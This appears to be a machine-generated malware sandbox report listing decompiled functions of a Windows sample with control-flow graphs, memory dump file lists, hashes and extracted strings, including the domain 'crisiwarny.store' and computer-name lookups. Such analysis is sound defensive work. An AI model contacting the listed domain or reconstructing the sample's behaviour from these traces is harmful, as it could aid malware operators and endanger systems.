                                                                                          control_flow_graph 360 480460-4806bb 361 4806c0-4806f4 360->361 361->361 362 4806f6-48070e 361->362 364 48071c-480736 362->364 365 480715-480717 362->365 367 480740-48076e 364->367 366 480b71-480b7b 365->366 367->367 368 480770-480790 367->368 370 480b49 368->370 371 480a8b-480aad 368->371 372 480b0c-480b15 368->372 373 4808ae-4808bc 368->373 374 480acf 368->374 375 480ac2 368->375 376 4808c3-4808d8 368->376 377 480906-480973 368->377 378 480b67 368->378 379 480b1c-480b2e 368->379 380 480b3e-480b40 368->380 381 4808df-4808ff 368->381 382 480af0-480aff 368->382 383 480ad5-480aeb 368->383 384 480b35 368->384 385 480797-4807c1 368->385 390 480b53 370->390 393 480ab4-480abb 371->393 372->370 372->378 372->379 372->380 372->384 387 480b5a-480b61 372->387 388 480b7c 372->388 389 480b83 372->389 372->390 373->370 373->371 373->372 373->374 373->375 373->376 373->377 373->378 373->379 373->380 373->381 373->382 373->383 373->384 373->387 373->388 373->389 373->390 375->374 376->370 376->371 376->372 376->374 376->375 376->377 376->378 376->379 376->380 376->381 376->382 376->383 376->384 376->387 376->388 376->389 376->390 391 480980-4809a5 377->391 392 480b6e 378->392 379->370 379->378 379->380 379->384 379->387 379->388 379->389 379->390 380->370 381->370 381->371 381->372 381->374 381->375 381->377 381->378 381->379 381->380 381->382 381->383 381->384 381->387 381->388 381->389 381->390 396 480b06 382->396 383->382 384->380 386 4807d0-4807f8 385->386 386->386 395 4807fa-480826 386->395 387->378 388->389 401 480b8a 389->401 390->387 391->391 399 4809a7-4809af 391->399 392->366 393->370 393->372 393->374 393->375 393->378 393->379 393->380 393->382 393->383 393->384 393->387 393->388 393->389 393->390 402 480830-48087a 395->402 396->372 403 4809d1-4809e0 399->403 404 4809b1-4809b9 399->404 401->401 402->402 405 48087c-480892 402->405 407 4809e2-4809e4 403->407 408 480a05-480a25 403->408 406 4809c0-4809cf 404->406 413 480897-4808a7 405->413 406->403 406->406 409 4809f0-480a01 407->409 410 480a30-480a6d 408->410 409->409 411 480a03 409->411 410->410 412 480a6f-480a84 410->412 411->408 412->371 413->370 413->371 413->372 413->373 413->374 413->375 413->376 413->377 413->378 413->379 413->380 413->381 413->382 413->383 413->384 413->387 413->388 413->389 413->390
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !m%k$#i4g$+e(c$@-+$crisiwarny.store$g!~_$v%r#$y)v'$yw
                                                                                          • API String ID: 0-2828184888
                                                                                          • Opcode ID: 2d2cf9de8f19b345753aca510332dd6a5fb3cfe6c724a0748b1c76e0390b7b0d
                                                                                          • Instruction ID: 7e9fd78be045040975057f9bf3314c80600c98f1ea3e7e66c59b4d01cee8bd81
                                                                                          • Opcode Fuzzy Hash: 2d2cf9de8f19b345753aca510332dd6a5fb3cfe6c724a0748b1c76e0390b7b0d
                                                                                          • Instruction Fuzzy Hash: 7BF188B111C3819FE3249F64D8847ABBBF4EB85300F108E2DEAD99B251D7798845CB96
                                                                                          Function 0049F9D0 Relevance: 10.1, APIs: 3, Strings: 2, Instructions: 1324COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0049F9FB
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0049FABA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID: \X"Q$a|cI
                                                                                          • API String ID: 3545744682-3233608862
                                                                                          • Opcode ID: a5e2521f860c483e47f0de1bbce9b588581134c7f65efe4b1def1f890cea2b75
                                                                                          • Instruction ID: 21be232f55f6f009ce331f826d2611d81c834e32981f7d0bb3e18a8fc6fd1e98
                                                                                          • Opcode Fuzzy Hash: a5e2521f860c483e47f0de1bbce9b588581134c7f65efe4b1def1f890cea2b75
                                                                                          • Instruction Fuzzy Hash: 3E9203316047818FD7298F39C490762BFE2AF96314F28C6AEC4D68B792D739D806CB54
                                                                                          Function 004979B0 Relevance: 8.0, Strings: 6, Instructions: 507COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 649 4979b0-497a11 650 497a20-497aa9 649->650 650->650 651 497aaf-497af6 650->651 653 497af8-497afd 651->653 654 497aff 651->654 655 497b02-497b2e call 47c880 653->655 654->655 659 497b30-497b32 655->659 660 497b34-497b6b call 47c880 655->660 659->660 663 497b70-497bc2 660->663 663->663 664 497bc4-497bcf 663->664 665 497bf1-497bfe 664->665 666 497bd1-497bd6 664->666 668 497c21-497c2c call 4b46d0 665->668 669 497c00-497c04 665->669 667 497be0-497bef 666->667 667->665 667->667 672 497c31-497c39 668->672 670 497c10-497c1f 669->670 670->668 670->670 673 497de8 672->673 674 497dfd-497eba 672->674 675 497efd-497f1f 672->675 676 497dee-497df4 call 47c890 672->676 677 497c50-497c61 672->677 678 497c40-497c47 672->678 679 497dd0 672->679 680 497dd6-497de0 672->680 682 497ec0-497edb 674->682 683 497f20-497f34 675->683 676->674 684 497c6a 677->684 685 497c63-497c68 677->685 678->677 680->673 682->682 687 497edd-497ef5 call 495540 682->687 683->683 688 497f36-497fc9 683->688 689 497c6c-497d1b call 47c880 684->689 685->689 687->675 692 497fd0-498018 688->692 697 497d20-497d4c 689->697 692->692 693 49801a-49803d call 495390 692->693 700 498045 693->700 697->697 699 497d4e-497d56 697->699 701 497d58-497d5f 699->701 702 497d71-497d7e 699->702 707 49804b-498054 call 47c890 700->707 703 497d60-497d6f 701->703 704 497da1-497dc1 call 4b46d0 702->704 705 497d80-497d84 702->705 703->702 703->703 704->673 704->675 704->676 704->679 704->680 704->700 704->707 712 498060 704->712 714 49806c-498074 call 47c890 704->714 715 498077-498083 704->715 716 498066 704->716 706 497d90-497d9f 705->706 706->704 706->706 707->712 712->716 714->715 716->714
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DG$Dw$Mx$n~$wE$qVw
                                                                                          • API String ID: 0-1111290910
                                                                                          • Opcode ID: 792db507c6e8eb407caf91159cfebecb54ff93e95f971f33409c5240e2e1963b
                                                                                          • Instruction ID: 30aa581a2466f192e878bf65e961f3196c805715b3ccf7b3bad0f8cedaf8a41f
                                                                                          • Opcode Fuzzy Hash: 792db507c6e8eb407caf91159cfebecb54ff93e95f971f33409c5240e2e1963b
                                                                                          • Instruction Fuzzy Hash: A9F1DCB16183408FD314DF25D89166BBBF0EF96318F048A2DF8958B391E7788906CB97
                                                                                          Function 0047F755 Relevance: 8.0, Strings: 6, Instructions: 466COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 719 47f755-47f75a 720 47f945 719->720 721 47f9c2-47f9e5 719->721 722 47f801-47f805 719->722 723 47f900-47f913 719->723 724 47f9c0 719->724 725 47f94d-47f956 719->725 726 47f98c-47f9a1 call 4b0e00 719->726 727 47f80a-47f816 719->727 728 47fa16-47fa1f 719->728 729 47f790-47f79c call 47c7e0 719->729 730 47fa10 719->730 731 47fa50-47fa52 719->731 732 47f81d-47f824 719->732 733 47fa5a-47fa66 719->733 734 47f919-47f925 719->734 735 47f826-47f837 719->735 736 47f8e5 719->736 737 47f761-47f765 719->737 738 47f7a0-47f7fa 719->738 739 47f960-47f96d 719->739 740 47fa20-47fa29 719->740 741 47fa2f 719->741 742 47f8ed-47f8f9 719->742 743 47f92c-47f93e 719->743 744 47f9ec-47f9f1 719->744 745 47f76a-47f785 719->745 746 47f9a8-47f9bf 719->746 747 47f973-47f985 719->747 748 47f9fe-47fa0b 719->748 749 47f9f8 719->749 720->725 721->728 721->730 721->731 721->733 721->740 721->741 721->744 721->749 750 47fa92-47fc72 721->750 751 47fcb0-47feb8 721->751 755 47fa38 722->755 723->734 724->721 725->739 726->721 726->724 726->728 726->730 726->731 726->733 726->740 726->741 726->744 726->746 726->749 726->750 726->751 727->720 727->721 727->723 727->724 727->725 727->726 727->728 727->730 727->731 727->732 727->733 727->734 727->735 727->736 727->739 727->740 727->741 727->742 727->743 727->744 727->746 727->747 727->748 727->749 728->740 729->738 731->733 756 47f873-47f89f 732->756 734->720 734->721 734->724 734->725 734->726 734->728 734->730 734->731 734->733 734->739 734->740 734->741 734->743 734->744 734->746 734->747 734->748 734->749 734->750 734->751 757 47f840-47f86b 735->757 736->742 752 47fa41-47fa47 737->752 738->720 738->721 738->722 738->723 738->724 738->725 738->726 738->727 738->728 738->730 738->731 738->732 738->733 738->734 738->735 738->736 738->739 738->740 738->741 738->742 738->743 738->744 738->746 738->747 738->748 738->749 739->747 740->741 741->755 742->723 743->720 743->721 743->724 743->725 743->726 743->728 743->730 743->731 743->733 743->739 743->740 743->741 743->744 743->746 743->747 743->748 743->749 743->750 743->751 744->728 744->730 744->731 744->733 744->740 744->741 744->749 744->750 744->751 745->729 746->724 747->721 747->724 747->726 747->728 747->730 747->731 747->733 747->740 747->741 747->744 747->746 747->749 747->750 747->751 748->739 767 47fc80-47fc95 750->767 769 47fec0-47fed5 751->769 752->731 755->752 771 47f8a0-47f8bd 756->771 757->757 770 47f86d-47f870 757->770 767->767 773 47fc97-47fca2 767->773 769->769 774 47fed7-47fedf 769->774 770->756 771->771 775 47f8bf-47f8de 771->775 773->751 777 47fee2 774->777 775->720 775->721 775->723 775->724 775->725 775->726 775->728 775->730 775->731 775->733 775->734 775->736 775->739 775->740 775->741 775->742 775->743 775->744 775->746 775->747 775->748 775->749 775->750 775->751 777->777
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 5c;e$>kjm$A'K)$Jg3i$S;W=$i#E%
                                                                                          • API String ID: 0-468034204
                                                                                          • Opcode ID: 851d7784f4e681017bd4bac9898410057fc48233695c722e52c57286ee8047c5
                                                                                          • Instruction ID: 583837e7b042ed9de32b73232a8184b115d8b80cc2aa1b6596bd2d44c7d6cb52
                                                                                          • Opcode Fuzzy Hash: 851d7784f4e681017bd4bac9898410057fc48233695c722e52c57286ee8047c5
                                                                                          • Instruction Fuzzy Hash: C01264B4114700CFD3249F25D889BAABBB1FB45310F1686BCD59A9F6B2D770A809CF49
                                                                                          Function 00496022 Relevance: 6.5, Strings: 5, Instructions: 224COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 779 496022-496041 780 496046-496051 779->780 780->780 781 496053-496055 780->781 782 496059-49605c 781->782 783 49605e-4960d2 782->783 784 4960d4-496108 782->784 783->782 785 49610a-49610d 784->785 786 4961bd-4961c7 785->786 787 496113-4961b8 785->787 788 4961cb-4961d6 786->788 787->785 789 4961d8 788->789 790 4961dd-4961f2 788->790 791 49629c-49629f 789->791 792 4961f9-4961ff 790->792 793 4961f4 790->793 796 4962a1 791->796 797 4962a3-4962c2 791->797 794 496208-49627b call 4b0f10 792->794 795 496201-496206 792->795 798 496285-496288 793->798 803 496280 794->803 795->798 796->797 802 4962c7-4962d2 797->802 800 49628a-49628e 798->800 801 496290-496297 798->801 800->791 801->788 802->802 804 4962d4 802->804 803->798 805 4962d6-4962d9 804->805 806 4962db-496320 805->806 807 496322-496347 805->807 806->805
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
